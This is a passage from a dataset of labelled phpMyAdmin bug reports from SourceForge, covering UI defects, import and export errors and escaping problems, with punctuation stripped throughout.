if a row in the source table contains data containing single quotes, it will not be synchronized.
e.g, the following statement is displayed, but not executed INSERT INTO ... ..., organization, ...) VALUES ... , Universita degli Studi di Udine ,...); Original URL https sourceforge.net p phpmyadmin bugs 3155 Original author anonymous Found in version 3.3.8","bug"
"24444","9547","clear button doesn t work.
if you open SQL tab inside database above the table list.
Under the SQL query textarea there is a clear button, when clicked it does nothing, the expected result would be to clear the textarea like the one inside the table view does.
Original URL https sourceforge.net p phpmyadmin bugs 3298 Original author anonymous Found in version 3.4.0","bug"
"24444","9548","XML import view of view fails.
cfr.
bugs 1762306, 1672099 Original URL https sourceforge.net p phpmyadmin bugs 3156 Original author ruleant","bug"
"24444","9549","XML export functions should be exported first.
cfr.
bug 3062455 functions routines should be exported before tables views Original URL https sourceforge.net p phpmyadmin bugs 3157 Original author ruleant","bug"
"24444","9550","newline before table name alias.
create table t1 a int); insert into t1 values 1); Using the SQL tab with select from t1 t yields the correct result row with number 1.
Using the SQL tab with select from t1 t note the newline before the table name alias t) results in the server s phpMyAdmin start screen for phpMyAdmin 3.4.0 beta1 and 3.3.8.1, and results in redisplaying the SQL tab for 2.11.11.1.
The expected result row with number 1 is missing.
Original URL https sourceforge.net p phpmyadmin bugs 3158 Original author julianladisch Found in version 3.4.0","bug"
"24444","9551","User preferences and hide db.
A database name entered in the user preferences Hide databases dialog gives an error.
Original URL https sourceforge.net p phpmyadmin bugs 3159 Original author lem9 Found in version 3.4.0","bug"
"24444","9552","Continue insertion problems.
Data entered in some kinds of input fields, for example a dropdown containing foreign keys, produces SQL errors.
Original URL https sourceforge.net p phpmyadmin bugs 3160 Original author lem9","bug"
"24444","9553","1064 bug in the SQL parser.
Steps done 1\.
databases export gzipped 2\.
database import what happened the import have failed with the following Error There is a chance that you may have found a bug in the SQL parser.
Please examine your query closely, and check that the quotes are correct and not mis matched.
Other possible failure causes may be that you are uploading a file with binary outside of a quoted text area.
You can also try your query on the MySQL command line interface.
The MySQL server error output below, if there is any, may also help you in diagnosing the problem.
If you still have problems or if the parser fails where the command line interface succeeds, please reduce your SQL query input to the single query that causes problems, and submit a bug report with the data chunk in the CUT section below BEGIN CUT eNpzDQryD7JScDZUcDZS8HH1s1IwUDBUMDE25woOAYrLc3EFhwEFVTxTVLh8K4MDfawUTPUM9EwN E3WT83NzS MySyp1c LTuUKDgxT8g3UUHN1d UJ0FMJcgbrDM MUPF0VLPQMuAJ8Ha0UjPWM9Sz0 DLkCPAJACnT8g0GmGekZmij4ZOaVVnD5OPq5Wymk5umWlqTpWnCBrZPv5mAAA Y3f2 PSjs UZbj 3vXgP4dqjqqENh74ttl6VMGoAuoqAABkZj5d END CUT BEGIN RAW ERROR C1 C2 LEN 0 1 437 STR SVN Id MySQL 5.0.51a community log USR OS, AGENT, VER Win IE 8.0 PMA 3.3.8.1 PHP VER,OS 5.2.14 Linux LANG en utf 8 SQL xefxbfxbdx08x03xefxbfxbdxefxbfxbdxdbx9afxc7x91 x08xefxbfxbdxefxbfxbdSxefxbfxbdxefxbfxbd|xefxbfxbd Uxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbd; xefxbfxbdx08x03xefxbfxbdxefxbfxbdxdbx9afxc7x91 x08xefxbfxbdxefxbfxbdSxefxbfxbdxefxbfxbd|xefxbfxbd Uxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbd; xefxbfxbdx08x03xefxbfxbdxefxbfxbdxdbx9afxc7x91 x08xefxbfxbdxefxbfxbdSxefxbfxbdxefxbfxbd|xefxbfxbd Uxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbd; xefxbfxbdx08x03xefxbfxbdxefxbfxbdxdbx9afxc7x91 x08xefxbfxbdxefxbfxbdSxefxbfxbdxefxbfxbd|xefxbfxbd Uxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbd; xefxbfxbdx08x03xefxbfxbdxefxbfxbdxdbx9afxc7x91 x08xefxbfxbdxefxbfxbdSxefxbfxbdxefxbfxbd|xefxbfxbd Uxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbd; xefxbfxbdx08x03xefxbfxbdxefxbfxbdxdbx9afxc7x91 x08xefxbfxbdxefxbfxbdSxefxbfxbdxefxbfxbd|xefxbfxbd Uxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbd; xefxbfxbdx08x03xefxbfxbdxefxbfxbdxdbx9afxc7x91 x08xefxbfxbdxefxbfxbdSxefxbfxbdxefxbfxbd|xefxbfxbd Uxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbd; xefxbfxbdx08x03xefxbfxbdxefxbfxbdxdbx9afxc7x91 x08xefxbfxbdxefxbfxbdSxefxbfxbdxefxbfxbd|xefxbfxbd Uxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbd; xefxbfxbdx08x03xefxbfxbdxefxbfxbdxdbx9afxc7x91 x08xefxbfxbdxefxbfxbdSxefxbfxbdxefxbfxbd|xefxbfxbd Uxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbd; xefxbfxbdx08x03xefxbfxbdxefxbfxbdxdbx9afxc7x91 x08xefxbfxbdxefxbfxbdSxefxbfxbdxefxbfxbd|xefxbfxbd Uxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbd; xefxbfxbdx08x03xefxbfxbdxefxbfxbdxdbx9afxc7x91 x08xefxbfxbdxefxbfxbdSxefxbfxbdxefxbfxbd|xefxbfxbd Uxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbd; xefxbfxbdx08x03xefxbfxbdxefxbfxbdxdbx9afxc7x91 x08xefxbfxbdxefxbfxbdSxefxbfxbdxefxbfxbd|xefxbfxbd Uxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbd; xefxbfxbdx08x03xefxbfxbdxefxbfxbdxdbx9afxc7x91 x08xefxbfxbdxefxbfxbdSxefxbfxbdxefxbfxbd|xefxbfxbd Uxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbd; xefxbfxbdx08x03xefxbfxbdxefxbfxbdxdbx9afxc7x91 x08xefxbfxbdxefxbfxbdSxefxbfxbdxefxbfxbd|xefxbfxbd Uxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbd; xefxbfxbdx08x03xefxbfxbdxefxbfxbdxdbx9afxc7x91 x08xefxbfxbdxefxbfxbdSxefxbfxbdxefxbfxbd|xefxbfxbd Uxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbd; xefxbfxbdx08x03xefxbfxbdxefxbfxbdxdbx9afxc7x91 x08xefxbfxbdxefxbfxbdSxefxbfxbdxefxbfxbd|xefxbfxbd Uxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbd; xefxbfxbdx08x03xefxbfxbdxefxbfxbdxdbx9afxc7x91 x08xefxbfxbdxefxbfxbdSxefxbfxbdxefxbfxbd|xefxbfxbd Uxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbd; xefxbfxbdx08x03xefxbfxbdxefxbfxbdxdbx9afxc7x91 x08xefxbfxbdxefxbfxbdSxefxbfxbdxefxbfxbd|xefxbfxbd Uxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbd; xefxbfxbdx08x03xefxbfxbdxefxbfxbdxdbx9afxc7x91 x08xefxbfxbdxefxbfxbdSxefxbfxbdxefxbfxbd|xefxbfxbd Uxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbd; END RAW SQL query xefxbfxbdx08x03xefxbfxbdxefxbfxbdxdbx9afxc7x91 x08xefxbfxbdxefxbfxbdSxefxbfxbdxefxbfxbd|xefxbfxbd Uxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbd; MySQL said 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near xe2x80xb9x08 at line 1 while this is going on from phpMyAdmin , i was able to create and restore a gzipped database manually.
Plaintext restore works correctly.
php.ini settings max execution time = 60 ; Maximum execution time of each script, in seconds max input time = 120 ; Maximum amount of time each script may spend parsing request data ;max input nesting level = 64 ; Maximum input variable nesting level memory limit = 196M ; Maximum amount of memory a script may consume 128MB) apache is set to keepalive on what can be done to resolve this situation and to get phpmyadmin work with gzipped importing.
Thank you for any suggestions!
Original URL https sourceforge.net p phpmyadmin bugs 3161 Original author yonatanp Found in version 3.3.8","bug"
"24444","9554","Query execution time disappears.
After executing a query, query time is displayed in a slide down .
The query time changes, however.
Why?
Also, why is a slide down used?
Firefox also froze due to a script, but I don t know the cause yet.
Original URL https sourceforge.net p phpmyadmin bugs 3162 Original author olafvdspek Found in version 3.4.0","bug"
"24444","9555","Action text.
I don t like the text besides the icon, it wastes space.
The More dropdown has actions like Primary, Unique, Index, etc.
I assume this is Add Primary?
This should be clarified.
Original URL https sourceforge.net p phpmyadmin bugs 3163 Original author olafvdspek Found in version 3.4.0","bug"
"24444","9556","Foreign Key Input Options.
A foreign key input field shows this when only one key is available 1) lt;option value= gt; amp;nbsp; lt; option gt; lt;option value= 1 gt; amp;nbsp; amp;nbsp;1 lt; option gt; lt;option value= gt; amp;nbsp; lt; option gt; lt;option value= gt; amp;nbsp; lt; option gt; lt;option value= 1 gt;1 amp;nbsp; amp;nbsp; lt; option gt; Original URL https sourceforge.net p phpmyadmin bugs 3164 Original author olafvdspek Found in version 3.4.0","bug"
"24444","9557","Config for export compression not used.
When you specify a crompression preset in the config file, e.g.
cfg[ Export ] = array format = gt; sql , compression = gt; bzip2 , asfile = gt; true ); instead of the selected compression none is used on the export page.
The compression has to changed by hand to get a bzip2 file instead of an uncompressed sql file.
Tryed with the lastest release 3.4.1 on ubuntu 10.04 LTS and apache 2.2.14 Original URL https sourceforge.net p phpmyadmin bugs 3310 Original author minichip Found in version 3.4.1","bug"
"24444","9558","Redundant Foreign Keys not supported.
I ve got one table with multiple constraints by accident) CONSTRAINT `xbt files users ibfk 4` FOREIGN KEY `uid`) REFERENCES `xbt users` `uid`) ON DELETE CASCADE, CONSTRAINT `xbt files users ibfk 1` FOREIGN KEY `fid`) REFERENCES `xbt files` `fid`) ON DELETE CASCADE, CONSTRAINT `xbt files users ibfk 2` FOREIGN KEY `uid`) REFERENCES `xbt users` `uid`) ON DELETE CASCADE, CONSTRAINT `xbt files users ibfk 3` FOREIGN KEY `fid`) REFERENCES `xbt files` `fid`) ON DELETE CASCADE pMA doesn t show this and it doesn t allow me to delete the redundant constraints.
Original URL https sourceforge.net p phpmyadmin bugs 3165 Original author olafvdspek Found in version 3.4.0","bug"
"24444","9559","Show all button wraps on privileges page.
On server privileges page the show all button sometimes wraps and ends up looking ugly, please see attached screenshot for illustration.
I think it s just missing a nowrap attribute or the use of amp;nbsp; instead of a plain space.
Original URL https sourceforge.net p phpmyadmin bugs 3311 Original author roccivic Found in version Latest Git","bug"
"24444","9560","Theme pmahomme 1.0 makes phpmyadmin unusable.
Using latest stable version phpMyAdmin 3.3.8.1 with pmahomme 1.0 theme from http www.phpmyadmin.net home page themes.php pma 3 3 results in unusable web interface.
Short version Vanilla phpMyAdmin 3.3.8.1 works like a charm but as soon as you drop contents of pmahomme 1.0.zip file into the themes folder web interface gets cluttered with garbage and no CSS.
You don t have to activate theme pmahomme it is just enough to extract the zip file to themes folder.
Results CSS is broken because phpmyadmin.css.php returns Content Type Header text html instead of text plain see attachment).
Garbage after closing lt; html gt; Tag on navigation and main frame see attachment).
Logfiles No entries in webserver error log regarding this issue.
Reproducible yes, 100 Workaround rm rf .
themes pmahomme 1.0 System Debian lenny 32bit running PHP via mod fcgid.
dpkg l | grep E php5 cgi|apache2 mpm|fcgi|mysql server ii apache2 mpm worker 2.2.9 10 lenny8 Apache HTTP Server high speed threaded model ii libapache2 mod fcgid 1 2.2 1 an alternative module compat with mod fastcgi ii mysql server 5.0.51a 24 lenny4 MySQL database server metapackage depending on the latest ver ii mysql server 5.0 5.0.51a 24 lenny4 MySQL database server binaries ii php5 cgi 5.2.6.dfsg.1 1 lenny9 server side, HTML embedded scripting language CGI binary) Original URL https sourceforge.net p phpmyadmin bugs 3166 Original author thermoman2","bug"
"24444","9561","Can t rename a database that contains views.
To reproduce go to demo server go to sakila db go to operations tab try to rename the db to sakila2 the actor table is moved to new db, but then the request fails because actor info is a view Copying and Dropping works fine though.
Browser Firefox 4.0.1 on Linux Original URL https sourceforge.net p phpmyadmin bugs 3314 Original author roccivic Found in version 3.4.2","bug"
"24444","9562","Unnecessary Details slider.
As reported a few times, the Details slider at bottom of table Structure needs an extra click for nothing and hampers usability.
Original URL https sourceforge.net p phpmyadmin bugs 3315 Original author lem9 Found in version 3.4.1","bug"
"24444","9563","FAQ 1.42 FIX.
about http wiki.phpmyadmin.net pma FAQ 1.42 why you don`t use require once dirname FILE ).
lib server.inc ; like drupal does, take a look http drupal.org node 180510 example here gt; require once dirname FILE ).
.
libraries common.inc.php ; Original URL https sourceforge.net p phpmyadmin bugs 3167 Original author ispbrasil","bug"
"24444","9564","error 1045 in FireFox Only.
1045 Cannot log in to the MySQL server I am presently using MariaDB, with phpMyAdmin 3.4.0 Beta 1 using localhost mode only.
Platform Windows 7 64, XAMPP 1.7.2 with Maria DB 5.2 On the same workstation, I can login with phpMyAdmin using Windows MSIE 8 but not Firefox 3.16.13 This had been running fine until just today, I only installed Firefox lt; 48 hours ago but I never had issues with IE .
It works with MS Internet Explorer 8 without issue but not FireFox.
The FireFox error console spews out a lot of warnings, yet no errors Samples Warning Unknown property box shadow .
Declaration dropped.
Source File http localhost phpmyadmin phpmyadmin.css.php?server=1 token=aec9e3ec8791ffa4c5311bbfe535bf7f js frame=right nocache=3878478059 Line 691 Warning Error in parsing value for filter .
Declaration dropped.
Source File http localhost phpmyadmin themes original jquery jquery ui 1.8.custom.css Line 18 Plus many more at launch of above with various lines.
login attempt Warning Unknown property box shadow .
Declaration dropped.
Source File http localhost phpmyadmin phpmyadmin.css.php?server=1 token=aec9e3ec8791ffa4c5311bbfe535bf7f js frame=right nocache=3878478059 Line 691 NOTE hosts file has 127.0.0.1 localhost as well as 1 localhost Original URL https sourceforge.net p phpmyadmin bugs 3168 Original author whitestarm Found in version 3.4.0","bug"
"24444","9565","Database structure order by size desc wrong.
When I order the tables by size, it s like this 1.6 g 2.1 g 264.7 m...
Original URL https sourceforge.net p phpmyadmin bugs 3169 Original author olafvdspek Found in version 3.3.7","bug"
"24444","9566","Copy operation misses SQL MODE setting.
When I copy a Drupal database from the db operations tab the `users` table breaks in the destination database.
I found that this is because the moveCopy ) function does not set the SQL MODE as our default export files do include SET SQL MODE= NO AUTO VALUE ON ZERO Adding this as a dirty hack into the code seemed to have the desired effect.
I unfortunately don t have the time to fix it properly.
But do we need more of these headers in moveCopy )?
maybe we need to use the whole header part from export???
I m adding a stripped sql export file to help reproduce this.
Drupal has a documentation page on this issue http drupal.org node 1029506 Original URL https sourceforge.net p phpmyadmin bugs 3320 Original author helmo Found in version Latest Git","bug"
"24444","9567","Unknown function call in export JSON file.
Ref.
ID 3130886 System Windows XP ZendServer CE 5.0.3 Php 5.3.3 Apache 2.2.16 MySQL 5.1.50 Log File [30 Dec 2010 13 35 00] PHP Fatal error Call to undefined function ) in C \Zend\phpMyAdmin\libraries\export\json.php on line 26 Error on phpMyAdmin Version 3.3.8.1 and up Version 3.3.8 is working.
Problem is the call of the i18n function ).
Src Code from File export json.php plugin list[ json ] = array text = gt; JSON , extension = gt; json , mime type = gt; text plain , options = gt; array array type = gt; begin group , name = gt; general opts ), array type = gt; hidden , name = gt; structure or data , ), array type = gt; end group ) ), options text = gt; Options ), lt; error ); Working Version export json.php plugin list[ json ] = array text = gt; JSON , extension = gt; json , mime type = gt; text plain , options = gt; array array type = gt; begin group , name = gt; general opts ), array type = gt; hidden , name = gt; structure or data , ), array type = gt; end group ) ), options text = gt; strOptions, lt; fixed version ); Original URL https sourceforge.net p phpmyadmin bugs 3170 Original author bimbel Found in version 3.3.8","bug"
"24444","9568","Problem with space between the size and unit.
A non breaking space was added in this commit between the size and unit http phpmyadmin.git.sourceforge.net git gitweb.cgi?p=phpmyadmin phpmyadmin;a=commit;h=755fc28b49b3012cc80881720f54f5c3781285ea However sometimes it shows where it is not meant to.
Please see the attached screenshot.
Original URL https sourceforge.net p phpmyadmin bugs 3321 Original author roccivic Found in version Latest Git","bug"
"24444","9569","Page selector dropdown broken with ORDER BY.
Run a custom SQL query that includes an ORDER BY and then try to select a page number from the dropdown.
Note that page forward, back, frst and last still work.
Original URL https sourceforge.net p phpmyadmin bugs 3171 Original author adrianbj Found in version Latest Git","bug"
"24444","9570","ENUM and SET cannot have Binary option.
The 3.3.8.1 update seems to have introduced the following bug If you have an ENUM or SET field with a Binary option in the list, the selected value will not display on the phpMyAdmin insert edit page.
This is true no matter what ENUM or SET option s) are selected.
The field data value shows up correctly on the browse page, but when you edit a record using the insert edit page, no option is selected.
If you don t reselect the option in the ENUM or SET field when you update a record, the data is erased for that field.
For now, this issue can be fixed by changing the Binary option to something else.
Original URL https sourceforge.net p phpmyadmin bugs 3172 Original author sharpened Found in version 3.3.8","bug"
"24444","9571","version disclosure to anonymous visitors.
Previous versions haven t disclosed phpMA version number right in the title of the login page.
This could be a security issue, providing potential attackers with useful information.
The fix is quite trivial usr share phpmyadmin libraries common.lib.php 2011 05 20 21 24 04.000000000 0400 usr share phpmyadmin libraries common.lib.php 2011 05 26 22 34 07.046076504 0400 2853,7 2853,7 vars[ server verbose or name ] = !empty GLOBALS[ cfg ][ Server ][ verbose ]) ?
GLOBALS[ cfg ][ Server ][ verbose ] GLOBALS[ cfg ][ Server ][ host ]; vars[ database ] = GLOBALS[ db ]; vars[ table ] = GLOBALS[ table ]; vars[ phpmyadmin version ] = phpMyAdmin .
PMA VERSION; \ vars[ phpmyadmin version ] = phpMyAdmin ; Update forced variables foreach updates as key = gt; val) \{ Original URL https sourceforge.net p phpmyadmin bugs 3324 Original author luxintenebris Found in version 3.4.1","bug"
"24444","9572","Untracked tables problem LeftFrameTableSep..
The Problem tested in phpMyAdmin 3.4 and 3.3.9.
Create a couple of tables with underscore as prefix separator and add configuration LeftFrameTableSeparator with underscore.
cfg[ LeftFrameTableSeparator ]= ; Select DB in the left frame and try to go to the Traking page.
Rows containing Tables with separator in it s names will be empty.
The Problem part of the code is in the file db tracking.php on line 152, where we trying to parse multidimentional array.
table list = PMA getTableList GLOBALS[ db ]); foreach table list as key = gt; value) \{ if PMA Tracker getVersion GLOBALS[ db ], value[ Name ]) == 1) \{ my tables[] = value[ Name ]; \} \} Original URL https sourceforge.net p phpmyadmin bugs 3174 Original author hanut Found in version 3.4.0","bug"
"24444","9573","Bit columns are not exported properly.
phpMyAdmin saves bit columns in exports as 0 or 1 , not b 0 or 0 ...
This is serious problem, because when I import SQL file back, all bit fields in all tables are set to 1, because SET field = 0 on bit column sets this column to 1.
I have no idea how to export my tables with bit column and preserve values on bit fields.
Original URL https sourceforge.net p phpmyadmin bugs 3327 Original author davidkolar Found in version 3.4.1","bug"
"24444","9574","Inline edit opens different db.
Today 30 mei 2011, I tried to use inline edit to add a filter to a get query default get query adding a WHERE `column name` = 3 .
When i pressed go , i got another database served instantly.
I got at the homepage btw.
This database has it s own different) login.
And the stranged thing was, that in the url, the ?db=databasename did correspond to the database i was working in.
When clicking a link in the database i got redirected to, the ?db=databasename changed to the database i was now working in, Browser Mozilla Firefox 4.0.1 PHP 5.2.6 1 lenny9 with Suhosin Patch 0.9.6.2 MySQL client version 5.0.51a PHP extension mysqli Original URL https sourceforge.net p phpmyadmin bugs 3328 Original author anonymous Found in version 3.4.1","bug"
"24444","9575","User prefs and validate upper bound.
In some parameters, for example Features General Maximum databases, if a user has changed the preference and saved, the upper bound is not verified against the value from the config file but against the new saved value.
In libraries config validate.lib.php, PMA config get validators ), the mechanism for fetching values from the config file does not work at least for me).
if substr uv[ i], 0, 6) == value ) \{ uv[ i] = PMA array read substr uv[ i], 6), GLOBALS[ cfg ]); \} At this point, GLOBALS[ cfg ] already contains the values from user prefs so we cannot use it to get the max value.
Original URL https sourceforge.net p phpmyadmin bugs 3175 Original author lem9 Found in version Latest Git","bug"
"24444","9576","Column headers not aligned.
When the columns headers are set to appear within long list of query results, they are wrongly aligned.
See the attached image.
MySQL 5.1 PHP 5.3 Browsers Chrome and Firefox Original URL https sourceforge.net p phpmyadmin bugs 3176 Original author madhuracj Found in version 3.4.0","bug"
"24444","9577","Inline Edit does not escape backslash.
1\.
prepare a table as follows in mysql CREATE TABLE `test bug` `idtest bug` int 11) NOT NULL AUTO INCREMENT, `test bug` varchar 45) DEFAULT NULL, PRIMARY KEY `idtest bug`) ) 2\.
INSERT INTO `test`.`test bug` `test bug`) VALUES test\\backslash ); 3\.
in phpMyAdmin, in inline edit, change the table, eg add the word go at the end 4\.
click save and note the generated SQL does not escape the backslash UPDATE `test bug` SET `test bug` = test\backslash go WHERE `test bug`.`idtest bug` = 1 AND `test bug`.`test bug` = test\backslash Original URL https sourceforge.net p phpmyadmin bugs 3330 Original author ruidc Found in version 3.4.1","bug"
"24444","9578","Edit relational page and page number.
If tracking is available, the last insert id of created relational page is lost, so the automatic layout of foreign keys does not work.
Original URL https sourceforge.net p phpmyadmin bugs 3177 Original author lem9 Found in version 3.3.9","bug"
"24444","9579","can t click back.
i can t click back on browser, it not go back click forward too).
phpmyadmin version 3.4.1 install on windows step to reproduce bug clean new install phpmyadmin create database and tables and fields.
go to phpmyadmin home click on any database click back or 5 mouse button, click back button) then it go no where click any table click back then it go no where too.
still on the current page not go back.
bug on browser firefox 4 i m not sure lower version too or not.)
internet explorer 9 opera 11 it works fine on google chrome safari please fix, because back forward button is very useful.
Original URL https sourceforge.net p phpmyadmin bugs 3332 Original author veo Found in version 3.4.1","bug"
"24444","9580","datepicker returns date in wrong format.
The javascript date picker in the Search window returns the date on my Firefox 3.2 on WinXP) in M D YYYY format, rather than in the mysql compliant YYYY MM DD.
Comparators do not then act as expected.
The date needs to be typed in for the search to perform correctly Original URL https sourceforge.net p phpmyadmin bugs 3178 Original author martinsettle Found in version 3.4.0","bug"
"24444","9581","error div misplaced.
the error div on chrome is placed under the other div like operations half width for exapmple... because the float left; property is not broken... the solution is to create a div or write into error class the CSS clear both; for separating the div with float by the other div, and leave a bit of space with margin top and bottom if needed... sorry for my english...I m italian...
Original URL https sourceforge.net p phpmyadmin bugs 3335 Original author diopralinato Found in version 3.4.4","bug"
"24444","9582","Unable to add a new user using Google Chrome.
Add a new user dialog is a long one and you have to scroll down to fill in some of the details as well as to click the ok button.
But the vertical scroll bar is locked when tried with Google Chrome and it makes it unable to add a new user.
MySQL 5.1 PHP 5.3 Browser Google Chrome 8.0.552.224 Original URL https sourceforge.net p phpmyadmin bugs 3179 Original author madhuracj Found in version 3.4.0","bug"
"24444","9583","chrome logout problem.
hey, in google chrome lastet windows linux mac os) on apache lighttpd ideawebserwer when you set auth type=http you cannot logout.
No webserwer error no js errors using chromium).
After press logout exit button i got redirect to http host phpmyadmin dir index.php?token=66847059958075a73dbc35812d482935 old usr=old username but i stay still login.
Original URL https sourceforge.net p phpmyadmin bugs 3180 Original author p4cket Found in version 3.3.9","bug"
"24444","9584","AJAX copy database does not refresh db list.
When copying database using AJAX, the database list in left frame is not updated.
It works in 3.3 branch.
Original URL https sourceforge.net p phpmyadmin bugs 3181 Original author nijel Found in version Latest Git","bug"
"24444","9585","Inline query edit is broken again.
The inline link to edit a query after it s executed is broken once again.
To reproduce go to demo server go to sakila db go to actor table select SQL tab click Go to execute the default query when results are shown the inline link near the query at the top of the page does nothing click once on Refresh or twice on Explain SQL Unexplain SQL Create PHP code without PHP code and the inline link works again I think this has something to do with the Query box because as soon as the Show query box link is gone, the inline query edit works once again.
Original URL https sourceforge.net p phpmyadmin bugs 3339 Original author roccivic Found in version Latest Git","bug"
"24444","9586","Database copy Error hides too quickly.
When copying database, the first error is show for some time and disappears.
I see this as first problem as the error should be displayed permanently waiting for user action.
What is even worse is that after submitting the form again, the message just flashes and there is no chance to read it.
Original URL https sourceforge.net p phpmyadmin bugs 3182 Original author nijel Found in version Latest Git","bug"
"24444","9587","Grid not adjusted to paper size orientation.
The grid drawn when schema is exported to Pdf does not get adjusted according to the selected paper size and orientation.
Original URL https sourceforge.net p phpmyadmin bugs 3183 Original author madhuracj Found in version 3.4.0","bug"
"24444","9588","Exporting database to PDF incomplete.
Exporting a database to PDF only exports the final table on the database.
Expected behavior is that all the tables in the database should be exported to the PDF.
Original URL https sourceforge.net p phpmyadmin bugs 3184 Original author madhuracj Found in version Latest Git","bug"
"24444","9589","Changes DB.
When I execute this query in DB xcc, pMA automatically changes DB to st forum.
It shouldn t do this.
It also causes the query to fail if the xcc.
prefix isn t present although the current DB is xcc).
select member id, uid from st forum.invision members m left join xcc.xwi serials s on member id = uid where uid is null Original URL https sourceforge.net p phpmyadmin bugs 3185 Original author olafvdspek Found in version 3.3.9","bug"
"24444","9590","Unable to edit a row if there is only one row in the table.
I am using phpMyAdmin version 3.3.3.
It is bundled with Plesk version 10.2.
It was recently installed in order to correct a problem I was having when I attempted to use phpMyAdmin to edit multiple databases apparantly, some session variables were not being handled properly when switching databases).
After the installation of the new version of Plesk and perhaps a new version of phpMyAdmin...??
I don t know if it is the same one or a new one), I began having a new problem using phpMyAdmin.
When using Internet Explorer both versions 7 and 8, from multiple PCs), I am able to successfully edit records in tables, UNLESS the table has only a single row.
If the table has only a single row, then, when I click the pencil icon on the row, I get the 2 blank records data entry screen, as if I had clicked the INSERT button.
Everything works fine with Firefox, Chrome and Safari.
The problem only exists on Internet Explorer.
I discovered that if I go into Internet Explorer and change the security settings to identify my server s IP as a trusted site, the problem goes away.
So, while I have a work around for the problem, it seems to be that this is a particularly odd problem to have in the first place.
I could understand if phpMyAdmin failed to work on ALL row editing unless the security setting was correct.
Quirky and probably not desirable, but at least that would be consistent behavior.)
But, to only fail when there was a single row in the table, and to only fail with Internet Explorer, seems to me to indicate that there is a more fundamental problem with the software somewhere that needs to be addressed.
Original URL https sourceforge.net p phpmyadmin bugs 3344 Original author djw86 Found in version 3.3.3","bug"
"24444","9591","Search result panel duplicates the elements.
I have tested the search result UI using the source code from current master branch in google chrome 8.0.552.237.
When I search for a text in a specific table it goes to result window and in that the tab navigation bar [1] and the search in database panel [2] repeats twice.
A screen shot of the issue is attached here.
I have retested the issue using the firefox browser but in that case it is working without any duplication.
And also I have tested the PMA 3.3.7 version on google chrome 8.0.552.237 and it is working without any duplication.
My testing environment contains following specifications.
OS Ubuntu 10.10 Server Apache 2.216 Mysql 2.5.0 php 5.3.3 Browser Google Chrome 8.0.552.237 Original URL https sourceforge.net p phpmyadmin bugs 3186 Original author anonymous Found in version Latest Git","bug"
"24444","9592","Empty dialog after attempt to create alr.... On database structure, when you try to create table which is already exsting, empty dialog pops up.
Original URL https sourceforge.net p phpmyadmin bugs 3187 Original author nijel Found in version Latest Git","bug"
"24444","9593","Version 3.4.2 timeout.
Fatal error Maximum execution time of 10 seconds exceeded in usr local www host220 data php data phpmyadmin libraries Error.class.php on line 392 On my server somtimes same error on line 400 and line 842 if i remember) of file Memory.class Original URL https sourceforge.net p phpmyadmin bugs 3347 Original author sabber Found in version 3.4.2","bug"
"24444","9594","Importing Exporting CSV defults to Semicolon.
When you try and Import table data under the Import tab and choose either CSV option the default terminator is a semicolon not a comma.
Same thing when trying to export a table to CSV.
Am I wrong in thinking that CSV stands for comma separated values, not SSV, semicolon separated values?
Original URL https sourceforge.net p phpmyadmin bugs 3189 Original author scotepi Found in version 3.3.9","bug"
"24444","9595","Inline query edit does not escape special chars.
To reproduce either create a database with the character in the name go to that database run any query select inline click go actual result the query is not executed and the user is dropped back onto the main page expected result the query is executed and the results are displayed or go to any database go to SQL tab run this query SELECT 1 1 select inline click go actual result mysql error expected result the query is executed as expected Original URL https sourceforge.net p phpmyadmin bugs 3348 Original author roccivic Found in version 3.4.2","bug"
"24444","9596","Foreign Key check fails on Import.
I exported a SQL dump of my database using PMA 3.3.8 via TCP IP to MySQL 5.1.50 log via MySQLi extension 5.1.47 for PHP 5.3.3 sapi Apache 2.2.
In the export I unchecked Comments and Structure and used Complete and Extended Inserts.
When importing the data into PMA 3.3.8 via Unix Socket to MySQL 5.1.52 via MySQLnd mysqlnd 5.0.7 dev 091210 Revision 304625 ) extension for PHP 5.3.4 sapi Apache 2.2.
The table structure is the same on both servers.
The specific issue I am having is the `bar` table has a foreign key relationship with the `foo` table and because the `bar` table is defined before the `foo` table in the dump the foreign key constraint fails.
Table creation statements CREATE TABLE `bar` `fooId` int 10) unsigned NOT NULL AUTO INCREMENT, `id` int 10) unsigned NOT NULL, `label` varchar 25) NOT NULL, PRIMARY KEY `fooId`,`id`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; CREATE TABLE `foo` `id` int 10) unsigned NOT NULL AUTO INCREMENT, `label` varchar 25) CHARACTER SET utf8 NOT NULL, PRIMARY KEY `id`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; ALTER TABLE `bar` ADD CONSTRAINT `bar ibfk 1` FOREIGN KEY `fooId`) REFERENCES `foo` `id`) ON DELETE CASCADE ON UPDATE CASCADE; The error generated on import is 1452 Cannot add or update a child row a foreign key constraint fails `assets`.`bar`, CONSTRAINT `bar ibfk 1` FOREIGN KEY `fooId`) REFERENCES `foo` `id`) ON DELETE CASCADE ON UPDATE CASCADE) I believe the main crux the problem is that inserts are being ordered in alphabetical order as apposed to ordering the inserts so the foreign data is inserted before the constraint that requires it.
Original URL https sourceforge.net p phpmyadmin bugs 3190 Original author lennynyktyk Found in version 3.3.8","bug"
"24444","9597","Backslashes in table name stop PMA from working.
To reproduce Create a table with name table\ without quotes).
Go to that table You see a MySQL error, because the table name was not escaped with PMA sqlAddSlashes ) Also Create a table with name tab\le without quotes).
